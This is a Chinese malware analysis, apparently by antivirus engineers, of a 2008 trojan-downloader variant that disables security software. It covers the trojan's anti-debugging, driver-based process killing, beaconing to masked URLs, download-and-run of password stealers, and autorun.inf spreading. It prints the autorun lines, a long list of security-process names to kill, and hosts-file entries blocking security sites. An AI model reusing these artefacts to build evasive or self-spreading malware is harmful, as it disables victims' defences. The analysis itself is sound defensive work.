12.11终结者定时器--对抗型木马(Win32.TrojDownloader.Agent.ns.41984)
“终结者定时器41984”(Win32.TrojDownloader.Agent.ns.41984),这是一个对抗型的木马下载器。它是近来流行的“超级AV 终结者”的一个变种,该系列下载器结合了AV终结者、机器狗、autorun病毒的特点,对网吧、企业等局域网用户和个人用户的影响都很大。
该下载器基本功能与不久前出现的“超级AV终结者”原始版本相同,都是利用各种对抗手段破坏用户电脑的安全防御、在电脑中驻扎,然后下载大量的盗号木马。
这个变种具有时效性,毒霸反病毒工程师检查后发现,病毒作者为其设定的有效期为2008-12-30,如果病毒发现系统时间已经是2009年,就会自动关闭。不过,这并不表示该毒在2009年就不会有威胁,因为病毒作者可以发送远程指令,随时为该毒升级。
该毒在穿透SSDT表后就关闭系统中的的安全软件,并将它们的进程映像劫持,令它们瘫痪。同时禁止用户访问任何与电脑安全有关的网页和使用系统自带的全部安全工具。
当以上工作全部完成,该毒就连接到病毒作者指定的地址,下载大量的盗号木马,下载量较之前的版本来说,更加庞大。
一、文件分析
1)母体dll
导出函数explore
获取ShellExecuteA,并调用”exploreropen.”打开当前目录。用于每个驱动器下打开目录。
导出函数SchedServiceMain、ServiceMain、SvchostEntry_W32Time
a)检测调试器:查找进程 OllyICE.exe,OllyDbg.exe,ImportREC.exe,C32Asm.exe,LordPE.exe,PEditor.exe等进程,如果存在则退出,不存在则调用IsDebuggerPresent,检测当前是否被调试,是的话退出。
b)创建NSDownLoader26AVip20081207互斥体,并判断是否存在,存在退出。
c)通过ring3下关卡巴进程。
d)释放资源102到%sys32dir%\Nskhelper2.sys,并创建服务NsRk1,启动,来恢复SSDT。
e)扫描当前系统进程列表,发现有安全软件进程,就调用驱动中的ZwTerminateProcess将它关闭。
进程列表
pccguide.exeZONEALARM.exezonealarm.exewink.exe
windows优化大师.exeWFINDV32.exewebtrap.exeWEBSCANX.exe
WEBSCAN.exevsstat.exeVSSCAN40VSHWIN32.exevshwin32.exe
VSECOMR.exeVPC32.exevir.exeVETTRAY.exeVET95.exe
vavrunr.exeUlibCfg.exeTSC.exetmupdito.exetmproxy.exe
TMOAgent.exeTmntsrv.exeTDS2-NT.exeTDS2-98.exeTCA.exe
TBSCAN.exesymproxysvc.exeSWEEP95.exespy.exe
SPHINX.exesmtpsvc.exeSMC.exesirc32.exeSERV95.exe
secu.exeSCRSCAN.exescon.exeSCANPM.exeSCAN32.exescan.exe
scam32.exesafeweb.exesafeboxTray.exern.exeRfw.exe
rescue32.exeregedit.exeRavTask.exeRavStub.exe
RavMonD.exeRavMon.exerav7win.exeRAV7.exeras.exe
pview95.exeprot.exeprogram.exePpPpWallRun.exe
pop3trap.exePERSFW.exePCFWALLICON.exepccwin98.exe
pccmain.exepcciomon.exePCCClient.exepcc.exePAVCL.exe
PADMIN.exeOUTPOST.exeoffice.exeNVC95.exeNUPGRADE.exe
norton.exeNORMIST.exeNMAIN.exenisum.exenisserv.exe
NAVWNT.exenavwnt.exeNAVW32.exeNAVW.exeNAVSCHED.exenavrunr.exeNAVNT.exeNAVLU32.exenavapw32.exenavapsvc.exe
N32ACAN.exems.exeMPFTRAY.exeMOOLIVE.exemoniker.exe
mon.exemicrosoft.exemcafee.exeLUCOMSERVER.exeluall.exe
LOOKOUT.exelockdown2000.exelamapp.exekwatch.exe
KVPreScan.exeKVMonXP.exeKRF.exeKPPMain.exekpfwsvc.exe
kpfw32.exeKPFW32.exekissvc.exekavstart.exekav32.exe
Kasmain.exeKabackreport.exeJED.exeiomon98.exeiom.exe
ICSSUPPNT.exeICMOON.exeICLOADNT.exeICLOAD95.exe
IceSword.exeice.exeIBMAVSP.exeIBMASN.exeIAMSERV.exe
IAMAPP.exeF-STOPW.exef-stopw.exeFRW.exeFP-WIN.exefp-win.exe
f-prot95.exeF-PROT.exefir.exeFINDVIRU.exeF-AGNT95.exe
explorewclass.exeESPWATCH.exeESAFE.exeEFINET32.exeECENGINE.exe
DVP95.exeDV95_O.exeDV95.exedebu.exedbg.exeDAVPFW.exe
CLEANER3.exeCLEANER.exeCLAW95CT.exeCLAW95.execfinet32.exe
cfinet.exeCFIND.exeCFIAUDIT.exeCFIADMIN.exeCCenter.exe
BLACKICE.exeBLACKD.exeavxonsol.exeAVWIN95.exeavsynmgr.exe
AVSCHED32.exeAVPUPD.exeAVPTC32.exeAVPNT.exeAVPMON.exeAVPM.exeavpdos32.exeAVPCC.exeavp32.exeavp.exeAVKSERV.exeavk.exeAVGCTRL.exeAVE32.exeAVCONSOL.exeAUTODOWN.exeATRACK.exeatrack.exeAPVXDWIN.exeantivir.exeANTI-TROJAN.exeanti.exe
ACKWIN32.exe360tray.exe360safe.exe_AVPM.exe_AVPCC.exe
_AVP32.exe
f)映像劫持以上进程,并指svchost.exe.
g)获取当前机子的MAC地址和操作系统版本及运行时间,向指定网址发信。
http://chi...1.3**2.org/3/Count.asp?mac=00-00-00-00-00-00&os=WinXP&ver=2...
h)解密网址
http://w...-1***3.com/count.txt和
http://chi...1.3**2.org/3.txt,下载里面的病毒到%temp%目录,并依次运行。
i)遍历驱动器,在非a:\和b:\驱动器根目录下创建autorun.inf,先判断autorun.inf是否已存在文件或文件夹,存在先删除,在创建,并将自身复制过去命名为system.dll,autorun.inf中调用system.dll的导出函数explore.
[autorun]
shell\open\command=rundll32system.dll,explore
shell\explore\command=rundll32system.dll,explore
j)释放资源105到%sys32dir%\appwinproc.dll,将其远程线程注入到explorer.exe进程中。
k)修改hosts文件,屏蔽安全软件网址。
127.0.0.1www.360.cn
127.0.0.1www.360safe.cn
127.0.0.1www.360safe.com
127.0.0.1www.chinakv.com
127.0.0.1www.rising.com.cn
127.0.0.1rising.com.cn
127.0.0.1dl.jiangmin.com
127.0.0.1jiangmin.com
127.0.0.1www.jiangmin.com
127.0.0.1www.duba.net
127.0.0.1www.eset.com.cn
127.0.0.1www.nod32.com
127.0.0.1shadu.duba.net
127.0.0.1union.kingsoft.com
127.0.0.1www.kaspersky.com.cn
127.0.0.1kaspersky.com.cn
127.0.0.1virustotal.com
127.0.0.1www.kaspersky.com
127.0.0.1www.cnnod32.cn
127.0.0.1www.lanniao.org
127.0.0.1www.nod32club.com
127.0.0.1www.dswlab.com
127.0.0.1bbs.sucop.com
127.0.0.1www.virustotal.com
127.0.0.1tool.ikaka.com
127.0.0.1360.qihoo.com
j)将系统服务lanmanserver和Browser设置为手动,并将其开启。
k)释放资源103到%sys32dir%下命名为NsPass?.sys(?为0、1、2依次类推),并创建对应的服务NsPsDk??(??为00、01、02),并启动,直接访问磁盘并将自己写入以下dll文件
%sys32dir%\schedsvc.dll
%sys32dir%\appmgmts.dll
%sys32dir%\srsvc.dll
%sys32dir%\w32time.dll
%sys32dir%\wiaservc.dll
驱动创建个数与上面文件写入有关,若正常写入驱动将为5个与其对应,某个dll没有正常写入,下次重启会多加一个驱动。
导出函数DllEntryPoint
a)判断当前是否注入svchost.exe,且时间是否在2008-12-30以前,是的话跳入主功能线程,否则不注入。同导出函数SchedServiceMain、ServiceMain、SvchostEntry_W32Time。
b)若不是,释放资源102回复ssdt,关闭杀软进程,然后ring3关卡巴,自己创建一个svchost.exe进程,将自身创建远程线程注入。
2)释放的资源102sys(Nskhelper2.sys)
恢复SSDT,并结束指定进程。
3)释放的资源103sys(NsPass?.sys)
直接访问磁盘并将自己写入以下dll文件
%sys32dir%\schedsvc.dll
%sys32dir%\appmgmts.dll
%sys32dir%\srsvc.dll
%sys32dir%\w32time.dll
%sys32dir%\wiaservc.dll
驱动创建个数与上面文件写入有关,若正常写入驱动将为5个与其对应,某个dll没有正常写入,下次重启会多加一个驱动。
4)释放的资源104dll(appwinproc.dll)
a)HookWM_MOVE,当有程序调用时,该dll被载入。
b)获取窗口,当发现有金山毒霸,360安全卫士,江民,木马,专杀,下载者,NOD32,卡巴斯基字样的窗口,则调TerminateProcess将其关闭。
